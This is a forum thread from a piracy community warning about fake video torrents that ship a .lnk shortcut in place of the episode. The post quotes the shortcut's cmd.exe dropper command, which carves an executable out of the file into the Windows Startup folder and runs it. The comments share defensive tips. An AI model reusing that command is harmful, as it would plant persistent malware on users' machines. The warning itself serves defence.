103

Malware Warning on video files (midwest.social)

submitted 2 months ago by DemBoSain@midwest.social to c/piracy@lemmy.dbzer0.com

14 comments fedilink hide all child comments

I have Sonarr and Radarr set up to keep me up to date on some TV shows. Lately I've gotten a handful of files that Sonarr refuses to import because of a .lnk file. The download consists of a folder with the name of the file I want. Inside the folder is a file with the same name, and a .lnk extension. The .lnk file is very big (950Mb), and programmed to run this script:

%ComSpec% /v:On/CSET el=Severance.S02E07.1080p.WEB.H264-SuccessfulCrab.mkv&SET c="%Appdata%\microsoft\windows\START MENU\PROGRAMS\STARTUP%Username%.exe"&(If not exist !c! Findstr/v "cmd.EXE Rj%TIME:~7,1%%TIME:~-2%" !el!.Lnk>!c!&Start "" !c!)&CD %tmp%&Echo.>!

As far as I can tell, this creates an empty executable file in your Windows startup folder, and copies a portion of the fake video file into it. It then runs the malware. And, since it's in your startup folder, it will run again every time you reboot.

The tracker is theRARBG, but it could also come from elsewhere. I've found it on a couple of different shows (not just this one), and they always download a couple of days before the airdate.

Be careful!

all 15 comments

sorted by: hot top controversial new old

[-] AHorseWithNoNeigh@lemmy.dbzer0.com 39 points 2 months ago

See these all the time, unfortunately. I just add a line in the torrent client to not download anything with that file extension.

[-] Comexs@lemmy.zip 34 points 2 months ago

PSA/HOWTO: Avoid fake mkv torrents. Avoid getting hacked

[-] otto@sh.itjust.works 16 points 2 months ago

I’ve been noticing these around. Sonar catches them and I just delete them and research. I found that it’s often for the next weeks episode of a show. Only days after the previous episode came out. So it’s easy to see something that looks suspect anyway.

[-] Biskii@lemmy.dbzer0.com 11 points 2 months ago

Thank you for the heads up!

[-] piccolo@sh.itjust.works 6 points 2 months ago

laughs in linux

[-] fubbernuckin@lemmy.dbzer0.com 15 points 2 months ago

You laugh in Linux now, but just wait until the year of the Linux desktop comes. Every malware developer on earth will be knocking on our door.

[-] coldsideofyourpillow@lemmy.cafe 4 points 2 months ago

That's when you switch to an even more obscure kernel

[-] Andromxda@lemmy.dbzer0.com 1 points 2 months ago

What about GNU Hurd ^^

[-] coldsideofyourpillow@lemmy.cafe 1 points 2 months ago

Tried it, would not recommend.

[-] Andromxda@lemmy.dbzer0.com 1 points 2 months ago* (last edited 2 months ago)

It's time for ReactOS then. Maybe FreeDOS? Or the most divine OS of all, TempleOS.

[-] mr_right@lemmy.dbzer0.com 3 points 2 months ago

never will

[-] Berstrrs@lemmy.dbzer0.com -1 points 2 months ago

I only laugh in Linux cause it's just the same anology as driving Dodge Ram in Europe - good luck finding spare parts.

At the same time VW Golf parts are sold almost in every convenience store.

[-] AmbiguousProps@lemmy.today 6 points 2 months ago

I luckily haven't encountered these yet, but I primarily use NZB

[-] LiveLM@lemmy.zip 5 points 2 months ago* (last edited 2 months ago)

This is why I fear plugging public trackers into the arr stack.
Would be nice if Sonarr could ignore any torrents available before an episode's listed air date